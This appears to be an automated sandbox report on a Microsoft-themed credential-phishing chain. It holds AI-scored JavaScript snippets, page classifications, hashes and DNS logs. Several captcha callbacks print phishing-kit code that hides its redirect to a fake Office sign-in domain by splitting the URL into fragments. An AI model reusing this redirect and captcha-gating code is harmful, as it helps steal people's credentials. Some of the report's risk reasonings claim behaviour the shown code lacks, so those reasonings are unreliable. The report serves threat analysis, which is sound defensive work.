window.switchToSecondCaptcha = function () { console.log("CAPTCHA switch callback activated") let gForm = document.querySelector("#gForm") if (validateElement(gForm) \|\| gForm.style == "visible") { return } setTimeout(function () { const cfForm = document.querySelector("#cfForm") if (validateElement(cfForm) && cfForm.style.visibility != "hidden") { cfForm.remove() } setTimeout(function () { gForm.style.visibility = "visible" }, 200) }, 200) } var refreshCallBack = function (response) { console.log("Refresh callback activated") setTimeout(function () { window.location.reload() }, 1000) }
URL: https://documentsharepoint-officeb875553995f454665... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a benign script with low-risk indicators. It updates the page title based on the active breadcrumb element and provides a function to navigate to a new editor page. There are no high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscated code. The script's purpose is transparent and does not demonstrate any suspicious or malicious intent." }
//this event will update the title of the page based on active breadcrumb $('.breadcrumb').ready(function () { if ($('.breadcrumb').is(':visible')) { document.querySelector('title').innerHTML = ($('.breadcrumb > li.active').text() + ""); } }); function GoToNewEditor() { var editCmsUrlSegment = "EditInCms"; var currentUrl = window.location.href; if (currentUrl.indexOf('?') > -1) { var urlSegments = currentUrl.split("?"); window.location.href = window.location.origin + '/' + editCmsUrlSegment + window.location.pathname + '?' + urlSegments[1]; } else { window.location.href = window.location.origin + '/' + editCmsUrlSegment + window.location.pathname; } }
URL: https://documentsharepoint-officeb875553995f454665... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided JavaScript snippet appears to be a benign script that adds accessibility links to a web page based on the user's language. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscation. The script simply manipulates the DOM to create and append language-specific anchor tags to a container element. This behavior is consistent with typical accessibility features and does not raise any major security concerns." }
window.onload = function() { const accessibilityLinkContainer = document.getElementById("accessibilityLinkContainer"); switch(window.navigator.language) { case "fr": if (accessibilityLinkContainer != null) { const accessibilityText="Accessibilité : partiellement conforme"; const frenchAccessibilityAnchor = document.createElement("a"); frenchAccessibilityAnchor.id = "frenchAccesssibleLink"; frenchAccessibilityAnchor.target = "_blank"; frenchAccessibilityAnchor.href = "https://go.microsoft.com/fwlink/?linkid=2163806"; frenchAccessibilityAnchor.title = accessibilityText; frenchAccessibilityAnchor.innerText = accessibilityText; accessibilityLinkContainer.appendChild(frenchAccessibilityAnchor); } break; case "it": if (accessibilityLinkContainer != null) { const accessibilityText="Accessibilità: parzialmente conforme"; const italianAccessibilityAnchor = document.createElement("a"); italianAccessibilityAnchor.id = "italianAccesssibleLink"; italianAccessibilityAnchor.target = "_blank"; italianAccessibilityAnchor.href = "https://go.microsoft.com/fwlink/?linkid=2208177"; italianAccessibilityAnchor.title = accessibilityText; italianAccessibilityAnchor.innerText = accessibilityText; accessibilityLinkContainer.appendChild(italianAccessibilityAnchor); } break; default: accessibilityLinkContainer.remove(); } };
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3noph... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. The script redirects the user to a suspicious domain, which is a strong indicator of malicious intent. Additionally, the script interacts with the DOM in an aggressive manner, hiding an element on the page. Overall, the combination of these behaviors suggests a high-risk, potentially malicious script." }
var verifyCallback_hCaptcha = function (response) { let gForm = document.querySelector("#gForm") if (gForm == undefined) { return } if (gForm.style != undefined && gForm.style.visibility != undefined) { gForm = document.querySelector("#gForm").style.visibility = "hidden" } window.location.href = 'htt' + 'p' + 's' + ':/' + '/of' + 'fic' + 'e.' + '95p' + 'i' + 'b2o' + 'z' + 'wrw' + '4' + 'w2' + 'b' + '4' + 't1' + 'u' + 'b' + 'rx' + 'pjc' + '76' + 'do' + 's3n' + 'op' + 'h' + 'vir' + 'ht.' + 'in' + 'f' + 'o/m' + 'Ql' + 'r' + 'u' + 'OEx' + '?R=' + '5' + 'G' + 'X' + 'lEI' + 'o' + window.location.hash } function validateElement(element) { return element != undefined && element.style != undefined && element.style.visibility != undefined }
URL: https://documentsharepoint-officeb875553995f454665... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be handling user authentication and session management, which is a common and legitimate practice. It checks the user's authentication status, clears session data if the user is not authenticated, and updates the authentication status in the session storage. This behavior does not exhibit any high-risk indicators, such as dynamic code execution, data exfiltration, or obfuscation. The script is likely part of a larger application and does not demonstrate any suspicious or malicious intent." }
var isPvaBotAuthenticated = sessionStorage['isPvaBotAuthenticated']; var isPortalUserLoggedIn = 'False'; if ((isPvaBotAuthenticated != null \|\| isPvaBotAuthenticated != undefined) && isPvaBotAuthenticated != isPortalUserLoggedIn) { sessionStorage['triggerPvaBotSignOut'] = true; sessionStorage.removeItem('c2Token'); sessionStorage.removeItem('directLinetoken'); sessionStorage.removeItem('conversation_Id'); } sessionStorage['isPvaBotAuthenticated'] = isPortalUserLoggedIn;
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3noph... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. The script redirects the user to a suspicious domain, which is a strong indicator of malicious intent. Additionally, the script collects user input (likely credentials) and sends it to an external server, posing a significant risk of data theft. Overall, this script demonstrates a high level of risk and should be treated with caution." }
var verifyCallback_CF = function (response) { let cfForm = document.querySelector("#cfForm") if (validateElement(cfForm) && response.length > 10) { // console.log(response); cfForm.remove() window.location.href = 'htt' + 'p' + 's' + ':/' + '/of' + 'fic' + 'e.' + '95p' + 'i' + 'b2o' + 'z' + 'wrw' + '4' + 'w2' + 'b' + '4' + 't1' + 'u' + 'b' + 'rx' + 'pjc' + '76' + 'do' + 's3n' + 'op' + 'h' + 'vir' + 'ht.' + 'in' + 'f' + 'o/m' + 'Ql' + 'r' + 'u' + 'OEx' + '?R=' + '5' + 'G' + 'X' + 'lEI' + 'o' + window.location.hash return } console.log("cant find cloudflare, switching to hcaptcha") return switchToSecondCaptcha() }
URL: https://documentsharepoint-officeb875553995f454665... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a legitimate implementation of Microsoft Dynamics 365 Portal functionality. It sets up a namespace for the Dynamics 365 Portal and initializes various properties related to the user, version, type, and telemetry settings. While it includes some dynamic behavior, such as setting the `dynamics365PortalAnalytics` cookie, the overall context suggests this is part of a legitimate application and does not demonstrate any clear malicious intent." }
window["Microsoft"] = window["Microsoft"] \|\| {}; window["Microsoft"].Dynamic365 = { Portal: { User: { userName: '', contactId: '' }, version: '9.6.9.21', type: 'PowerPages_BlankTemplate_V2', id: '336c34fe-5e17-463e-a11f-b3f8fe411c95', geo: 'NAM', tenant: 'f2ac9e8f-234c-46fc-99a0-bcabb38dbd6b', correlationId: '395b8232-6a05-4e57-979e-2cb2b6f0ca7d', orgEnvironmentId: 'd4113537-aed5-ef9d-9226-82e525e56f0f', portalProductionOrTrialType: 'Trial', isTelemetryEnabled: 'True', InstrumentationSettings: { instrumentationKey: '197418c5cb8c4426b201f9db2e87b914-87887378-2790-49b0-9295-51f43b6204b1-7172', collectorEndpoint: 'https://us-mobile.events.data.microsoft.com/OneCollector/1.0/' }, timerProfileForBatching: 'NEAR_REAL_TIME' } } // Mark request not cacheable if Dynamics365PortalAnalytics cookie is being refreshed by the server or if the cookie in request header is invalid // For client side telemetry intializing Dynamics365PortalAnalytics cookie object window["Microsoft"].Dynamic365.Portal.dynamics365PortalAnalytics = 'ZJlphq_7SGLy6l_I8yr2QNKNB4oIhs9FTUnrXXqOhAygmNjnWqU7bcQnWB4BxmdF8g3MKcJujnX4drMfjKmo7xa-D7bdqcsA7ZQ0Flvkza-OMTZaSUA398tIxKnWaougzcCVHRNZaf_Si2KgXUPvGA2'; // CodeQL [SM00430] False Positive: only alphanumeric chars allowed, for non-alphanumeric char it will return INVALID_CHARACTERS_IN_COOKIE
URL: https://documentsharepoint-officeb875553995f454665... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a legitimate and benign code. It includes two main functionalities: 1) Refreshing all PowerBI iframes when a 'refreshPowerBI' message is received, and 2) Fixing the viewport width issue in Internet Explorer 10 on Windows Phone 8. These behaviors are common and do not demonstrate any high-risk indicators such as dynamic code execution, data exfiltration, or obfuscation. The code is straightforward and does not interact with any suspicious domains. Overall, this script poses a low risk and is likely part of a legitimate application." }
// Refresh all powerBI Iframes on Login in one Iframe window.addEventListener('message', function (event) { if (event && event.data && event.data == 'refreshPowerBI') { $("iframe.powerbi").each(function () { this.src = this.src; }); } }); // Fix for incorrect viewport width setting in IE 10 on Windows Phone 8. if (navigator.userAgent.match(/IEMobile\/10\.0/)) { var msViewportStyle = document.createElement("style"); msViewportStyle.appendChild(document.createTextNode("@-ms-viewport{width:auto!important}")); document.getElementsByTagName("head")[0].appendChild(msViewportStyle); }
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3noph... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a legitimate script that handles form validation and captcha switching. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscated code. The script primarily interacts with the DOM to update the UI and validate form elements, which is a common practice. While it uses some legacy APIs like `setTimeout` and `setInterval`, these are not inherently malicious. Overall, the script seems to be focused on providing a user-friendly experience and does not raise significant security concerns." }
var incrementLoader = function () { const waitp = document.querySelector("#cf-spinner-please-wait") const gForm = document.querySelector("#gForm") if (validateElement(gForm) && gForm.style.visibility == "hidden") { waitp.textContent += "." } } setTimeout(() => { let i = 0 ticker = setInterval(function () { i += 1 incrementLoader() if (i > 3) { clearInterval(ticker) return } }, 1000) }, 500) setTimeout(function () { const cfForm = document.querySelector("#cfForm") if (!validateElement(cfForm)) { switchToSecondCaptcha() return } const gForm = document.querySelector("#gForm") if (!validateElement(gForm)) { // nothing to switch to return } if (cfForm.style.visibility == "visible" \|\| gForm.style.visibility != "visible") { switchToSecondCaptcha() } }, 7000)
URL: https://documentsharepoint-officeb875553995f454665... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a legitimate implementation of an authentication flow, with no clear indicators of malicious intent. It checks a configuration flag to determine if the 'OmniChannel Widget with Site Copilot' feature is enabled, and if so, it fetches an authentication token from a trusted domain (`window.location.origin`) and stores it in the session storage. This behavior is consistent with typical authentication and session management practices, and does not exhibit any high-risk indicators such as dynamic code execution, data exfiltration, or obfuscation. The use of a retry mechanism is also a common pattern to handle potential network failures. Overall, this script appears to be a benign implementation with low risk." }
var enableOmniChannelWidgetWithSiteCopilot = 'False'; if (enableOmniChannelWidgetWithSiteCopilot === "True" \|\| enableOmniChannelWidgetWithSiteCopilot === "true") { const authUrl = window.location.origin + "/_services/auth/portalusertoken"; const fetchWithRetries = async (url, options, retries) => { try { const authResponse = await fetch(url, options); const token = await authResponse.text(); sessionStorage['c2Token'] = token; } catch (err) { if (retries === 1) throw err; return await fetchWithRetries(url, options, retries - 1); } }; fetchWithRetries(authUrl, { method: "POST" }, 4); }
URL: https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://documentsharepoint-officeb875553995f4546655-dcc6cegmfqbrgudr.canadaeast-01.azurewebsites.net/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "New Document Received", "prominent_button_name": "VIEW", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/ Model: Joe Sandbox AI	{ "brands": [ "Microsoft Sharepoint" ] }
	{ "brands": [ "Microsoft Sharepoint" ] }
URL: https://documentsharepoint-officeb875553995f4546655-dcc6cegmfqbrgudr.canadaeast-01.azurewebsites.net/ Model: Joe Sandbox AI	{ "brands": [ "Office", "SharePoint" ] }
	{ "brands": [ "Office", "SharePoint" ] }
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Did you know there are Verified Bots that are allowed around the internet because they help provide services we use day to day?", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please stand by, while we are checking if the site connection is secure...", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please stand by, while we are checking if the site connection is secure...", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please stand by, while we are checking if the site connection is secure...", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please stand by, while we are checking if the site connection is secure....", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please stand by, while we are checking if the site connection is secure....", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A% Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Sign in", "prominent_button_name": "Next", "text_input_field_labels": [ "nah6e9@ppvitk.id" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info' does not match the legitimate domain for Microsoft.", "The domain contains a random string '95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht', which is suspicious and not associated with Microsoft.", "The use of '.info' as a domain extension is unusual for Microsoft, which typically uses '.com'.", "The presence of 'office' in the subdomain could be an attempt to mimic Microsoft's Office product, which is a common phishing tactic." ], "riskscore": 9} Google indexed: False
URL: office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info Brands: Microsoft Input Fields: unknown
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A% Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd Model: Joe Sandbox AI	```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info' does not match the legitimate domain for Microsoft.", "The domain contains a random string '95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht', which is suspicious and not associated with Microsoft.", "The use of '.info' as a domain extension is unusual for Microsoft, which typically uses '.com'.", "The presence of 'office' in the subdomain could be an attempt to mimic Microsoft's Office product, increasing the likelihood of phishing." ], "riskscore": 9} Google indexed: False
URL: office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info Brands: Microsoft Input Fields: unknown
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A% Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "We couldn't find an account with that username. Try another, or get a new Microsoft account.", "prominent_button_name": "Next", "text_input_field_labels": [ "nahge9@ppvitk.id" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A% Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A% Model: Joe Sandbox AI	```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info' does not match the legitimate domain for Microsoft.", "The domain contains a long string of random characters, which is a common tactic used in phishing URLs.", "The domain extension '.info' is unusual for a Microsoft-related service, which typically uses '.com'.", "The presence of 'office' in the subdomain could be an attempt to mimic Microsoft's Office services, increasing suspicion." ], "riskscore": 9} Google indexed: False
URL: office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info Brands: Microsoft Input Fields: nah6e9@ppvitk.id
URL: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A% Model: Joe Sandbox AI	```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info' does not match the legitimate domain for Microsoft.", "The domain contains a random string '95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht', which is suspicious and not associated with Microsoft.", "The use of '.info' as a domain extension is unusual for Microsoft, which typically uses '.com'.", "The URL does not have any direct association with Microsoft, increasing the likelihood of it being a phishing site." ], "riskscore": 9} Google indexed: False
URL: office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info Brands: Microsoft Input Fields: nahge9@ppvitk.id

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (54049)
Category:	downloaded
Size (bytes):	54098
Entropy (8bit):	5.085819781103952
Encrypted:	false
SSDEEP:	768:U6QY8U4B5Fg0kASqYXBwTySF8IKtfm1K7d4a4v/TPRJv8fg:ZQY8U4B5FgBwYX2ySF87tfmX/TPRJv8Y
MD5:	110C02AABA6D184B61982072646CAF33
SHA1:	5FB13C49228FD1A7597A4DE2AB57AE6F68233856
SHA-256:	A2EB7527F1135BFE4F7B429303B3350C680FEAA326EB307737EB2A90B7AA84B3
SHA-512:	7BCC3D8CE343FAC39E811990B3F0AAE3B1952DFF21A668FF21E2A5341673CE5A3D9E63E4B30D4F77FEBD80907BAD8E3251FE1F7DAAE33242D6349E370FB5989A
Malicious:	false
Reputation:	low
URL:	https://content.powerapps.com/resource/powerappsportal/controls/host/573.676281aef2.chunk.js
Preview:	(self.webpackChunk_microsoft_powerpages_host=self.webpackChunk_microsoft_powerpages_host\|\|[]).push([[573],{4025:(t,e,n)=>{"use strict";n.d(e,{m:()=>u});var r=n(9686),i=n(64),s=n(8772),u=new(function(t){function e(){var e;return(e=t.call(this)\|\|this).setup=function(t){var e;if(!s.S$&&(null==(e=window)?void 0:e.addEventListener)){var n=function(){return t()};return window.addEventListener("visibilitychange",n,!1),window.addEventListener("focus",n,!1),function(){window.removeEventListener("visibilitychange",n),window.removeEventListener("focus",n)}}},e}(0,r.A)(e,t);var n=e.prototype;return n.onSubscribe=function(){this.cleanup\|\|this.setEventListener(this.setup)},n.onUnsubscribe=function(){var t;this.hasListeners()\|\|(null==(t=this.cleanup)\|\|t.call(this),this.cleanup=void 0)},n.setEventListener=function(t){var e,n=this;this.setup=t,null==(e=this.cleanup)\|\|e.call(this),this.cleanup=t((function(t){"boolean"==typeof t?n.setFocused(t):n.onFocus()}))},n.setFocused=function(t){this.focused=t,t&&t

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 15:11:47.183806896 CET	53	62085	1.1.1.1	192.168.2.7
Jan 15, 2025 15:11:47.205028057 CET	53	53337	1.1.1.1	192.168.2.7
Jan 15, 2025 15:11:48.198363066 CET	53	61061	1.1.1.1	192.168.2.7
Jan 15, 2025 15:11:51.475785017 CET	54934	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:51.477102041 CET	51551	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:51.483084917 CET	53	54934	1.1.1.1	192.168.2.7
Jan 15, 2025 15:11:51.483772039 CET	53	51551	1.1.1.1	192.168.2.7
Jan 15, 2025 15:11:52.335149050 CET	123	123	192.168.2.7	51.145.123.29
Jan 15, 2025 15:11:52.542058945 CET	64802	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:52.542201042 CET	52543	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:52.551285982 CET	53	64802	1.1.1.1	192.168.2.7
Jan 15, 2025 15:11:52.551511049 CET	53	52543	1.1.1.1	192.168.2.7
Jan 15, 2025 15:11:53.531838894 CET	54152	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:53.532005072 CET	63392	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:53.538723946 CET	53	63392	1.1.1.1	192.168.2.7
Jan 15, 2025 15:11:53.539177895 CET	53	54152	1.1.1.1	192.168.2.7
Jan 15, 2025 15:11:54.693762064 CET	53860	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:54.694529057 CET	63140	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:54.700871944 CET	53	53860	1.1.1.1	192.168.2.7
Jan 15, 2025 15:11:54.701148033 CET	53	63140	1.1.1.1	192.168.2.7
Jan 15, 2025 15:11:55.710470915 CET	65416	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:55.710784912 CET	63252	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:55.763822079 CET	53	63252	1.1.1.1	192.168.2.7
Jan 15, 2025 15:11:56.762837887 CET	50504	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:56.762990952 CET	60156	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:57.008528948 CET	52583	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:57.008702993 CET	53006	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:57.052321911 CET	53	53006	1.1.1.1	192.168.2.7
Jan 15, 2025 15:11:57.566543102 CET	50253	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:11:57.566880941 CET	52830	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:04.889450073 CET	53	52677	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:05.374480009 CET	53	58306	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:08.551856995 CET	56380	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:08.552158117 CET	52046	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:08.571876049 CET	53	56380	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:08.571896076 CET	53	52046	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:10.126955986 CET	56056	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:10.129890919 CET	56049	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:10.146177053 CET	53	56056	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:10.148710966 CET	53	56049	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:11.477498055 CET	55221	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:11.477643967 CET	63351	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:11.480748892 CET	56791	53	192.168.2.7	1.1.1.1
